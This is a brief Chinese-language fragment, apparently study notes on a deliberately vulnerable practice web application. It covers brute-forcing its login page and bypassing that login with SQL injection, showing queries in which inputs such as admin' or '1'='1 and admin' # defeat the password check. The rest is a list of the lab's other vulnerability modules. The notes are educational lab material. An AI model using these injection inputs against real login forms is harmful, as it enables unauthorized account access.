一打開就是這種界面,因為是brute force,所以先嘗試爆破
設置Payloads
還有一種方法是利用sql注入
SELECT * FROM `users` WHERE user=admin or 『1』=』1』 AND password=;
SELECT * FROM `users` WHERE user=admin # 』 AND password=;
SELECT * FROM `users` WHERE user=admin
2.命令執行
3.CSRF(跨站請求偽造)
4.文件包含
5.SQL注入
6.SQL盲注
7.文件上傳
8.反射型XSS
9.存儲型XSS